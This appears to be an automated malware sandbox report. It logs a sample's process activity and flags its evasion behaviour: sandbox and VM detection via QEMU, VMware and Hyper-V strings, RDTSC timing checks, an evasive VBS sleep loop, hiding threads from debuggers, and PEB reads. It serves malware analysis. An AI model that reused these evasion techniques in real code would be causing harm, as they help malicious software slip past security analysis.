Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\help.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\help.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\help.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\help.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\help.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Potential evasive VBS script found (sleep loop)
Source: Initial file Initial file: For i = 1 To len(h) step 2 if i mod 21 = 0 then Wscript.Sleep(1)
Tries to detect Any.run
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: powershell.exe, 00000011.00000002.728647487.00000000090D0000.00000004.00000001.sdmp Binary or memory string: USER32NTDLLKERNEL32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=PROGRAMFILES=\INTERNET EXPLORER\IEINSTAL.EXEWINDIR=\SYSWOW64\MSHTML.TLB
Source: powershell.exe, 00000011.00000002.728647487.00000000090D0000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Tries to detect virtualization through RDTSC time measurements
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe RDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe RDTSC instruction interceptor: First address: 0000000000409B6E second address: 0000000000409B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\help.exe RDTSC instruction interceptor: First address: 0000000000119904 second address: 000000000011990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\help.exe RDTSC instruction interceptor: First address: 0000000000119B6E second address: 0000000000119B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6260 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\SysWOW64\help.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Found dropped PE file which has not been started or loaded
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\lmt3yvf4\lmt3yvf4.dll Jump to dropped file
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB46A60 rdtscp 24_2_1EB46A60
Contains long sleeps (>= 3 min)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3319 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1404 Jump to behavior
Found large amount of non-executed APIs
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe API coverage: 5.9 %
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe System information queried: ModuleInformation Jump to behavior
Source: powershell.exe, 00000011.00000002.720651917.000000000504A000.00000004.00000001.sdmp Binary or memory string: Hyper-V
Source: explorer.exe, 00000019.00000000.729141257.0000000008430000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000019.00000000.707314759.00000000083E0000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00dRom0
Source: explorer.exe, 00000021.00000000.859197803.00000000011D8000.00000004.00000020.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}<
Source: powershell.exe, 00000011.00000002.728830952.000000000A5AA000.00000004.00000001.sdmp, ieinstal.exe, 00000018.00000002.778562700.000000000495A000.00000004.00000001.sdmp Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: explorer.exe, 00000021.00000000.890892741.0000000007138000.00000004.00000001.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: powershell.exe, 00000011.00000002.728830952.000000000A5AA000.00000004.00000001.sdmp, ieinstal.exe, 00000018.00000002.778562700.000000000495A000.00000004.00000001.sdmp Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: explorer.exe, 00000019.00000000.721697637.0000000006416000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: powershell.exe, 00000011.00000002.728647487.00000000090D0000.00000004.00000001.sdmp Binary or memory string: user32ntdllkernel32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=ProgramFiles=\internet explorer\ieinstal.exewindir=\syswow64\mshtml.tlb
Source: powershell.exe, 00000011.00000002.728830952.000000000A5AA000.00000004.00000001.sdmp, ieinstal.exe, 00000018.00000002.778562700.000000000495A000.00000004.00000001.sdmp Binary or memory string: Hyper-V Time Synchronization Service
Source: ieinstal.exe, 00000018.00000003.695578937.0000000003077000.00000004.00000001.sdmp, ieinstal.exe, 00000018.00000003.695357572.0000000003083000.00000004.00000001.sdmp, ieinstal.exe, 00000018.00000002.777998962.0000000003077000.00000004.00000020.sdmp, ieinstal.exe, 00000018.00000002.777872681.000000000303E000.00000004.00000020.sdmp, ieinstal.exe, 00000018.00000002.778047822.0000000003083000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000021.00000000.888412818.0000000007026000.00000004.00000001.sdmp Binary or memory string: k\\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: powershell.exe, 00000011.00000002.728647487.00000000090D0000.00000004.00000001.sdmp Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: powershell.exe, 00000011.00000002.718935785.0000000004AE7000.00000004.00000001.sdmp, powershell.exe, 00000011.00000002.720651917.000000000504A000.00000004.00000001.sdmp Binary or memory string: m:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
Source: powershell.exe, 00000011.00000002.728830952.000000000A5AA000.00000004.00000001.sdmp, ieinstal.exe, 00000018.00000002.778562700.000000000495A000.00000004.00000001.sdmp Binary or memory string: Hyper-V Heartbeat Service
Source: explorer.exe, 00000021.00000000.889355207.00000000070BB000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000px
Source: smartscreen.exe, 00000025.00000002.887372203.0000026134F28000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: powershell.exe, 00000011.00000002.728830952.000000000A5AA000.00000004.00000001.sdmp, ieinstal.exe, 00000018.00000002.778562700.000000000495A000.00000004.00000001.sdmp Binary or memory string: Hyper-V Guest Shutdown Service
Source: explorer.exe, 00000019.00000000.721697637.0000000006416000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: ieinstal.exe, 00000018.00000002.778562700.000000000495A000.00000004.00000001.sdmp Binary or memory string: vmicshutdown
Source: explorer.exe, 00000019.00000000.707314759.00000000083E0000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000021.00000000.888412818.0000000007026000.00000004.00000001.sdmp Binary or memory string: k\\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}esS
Source: powershell.exe, 00000011.00000002.728830952.000000000A5AA000.00000004.00000001.sdmp, ieinstal.exe, 00000018.00000002.778562700.000000000495A000.00000004.00000001.sdmp Binary or memory string: Hyper-V PowerShell Direct Service
Source: explorer.exe, 00000019.00000000.747895026.00000000082E2000.00000004.00000001.sdmp Binary or memory string: Prod_VMware_SATA+
Source: ieinstal.exe, 00000018.00000002.778562700.000000000495A000.00000004.00000001.sdmp Binary or memory string: vmicvss
Source: explorer.exe, 00000019.00000000.747895026.00000000082E2000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
Source: powershell.exe, 00000011.00000002.728830952.000000000A5AA000.00000004.00000001.sdmp, ieinstal.exe, 00000018.00000002.778562700.000000000495A000.00000004.00000001.sdmp Binary or memory string: Hyper-V Data Exchange Service
Source: powershell.exe, 00000011.00000002.728830952.000000000A5AA000.00000004.00000001.sdmp, ieinstal.exe, 00000018.00000002.778562700.000000000495A000.00000004.00000001.sdmp Binary or memory string: Hyper-V Guest Service Interface
Source: explorer.exe, 00000019.00000000.747895026.00000000082E2000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: ieinstal.exe, 00000018.00000002.778562700.000000000495A000.00000004.00000001.sdmp Binary or memory string: vmicheartbeat
Source: explorer.exe, 00000019.00000000.729141257.0000000008430000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
Source: explorer.exe, 00000019.00000000.738782106.000000000095C000.00000004.00000020.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G

Anti Debugging
barindex
Hides threads from debuggers
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Thread information set: HideFromDebugger Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB46A60 rdtscp 24_2_1EB46A60
Enables debug privileges
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\help.exe Process token adjusted: Debug Jump to behavior
Contains functionality to read the PEB
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB2AAB0 mov eax, dword ptr fs:[00000030h] 24_2_1EB2AAB0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB2AAB0 mov eax, dword ptr fs:[00000030h] 24_2_1EB2AAB0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB4FAB0 mov eax, dword ptr fs:[00000030h] 24_2_1EB4FAB0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB152A5 mov eax, dword ptr fs:[00000030h] 24_2_1EB152A5
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB152A5 mov eax, dword ptr fs:[00000030h] 24_2_1EB152A5
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB152A5 mov eax, dword ptr fs:[00000030h] 24_2_1EB152A5
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB152A5 mov eax, dword ptr fs:[00000030h] 24_2_1EB152A5
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB152A5 mov eax, dword ptr fs:[00000030h] 24_2_1EB152A5
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EBE0EA5 mov eax, dword ptr fs:[00000030h] 24_2_1EBE0EA5
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EBE0EA5 mov eax, dword ptr fs:[00000030h] 24_2_1EBE0EA5
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EBE0EA5 mov eax, dword ptr fs:[00000030h] 24_2_1EBE0EA5
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB946A7 mov eax, dword ptr fs:[00000030h] 24_2_1EB946A7
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB4D294 mov eax, dword ptr fs:[00000030h] 24_2_1EB4D294
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB4D294 mov eax, dword ptr fs:[00000030h] 24_2_1EB4D294
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EBAFE87 mov eax, dword ptr fs:[00000030h] 24_2_1EBAFE87
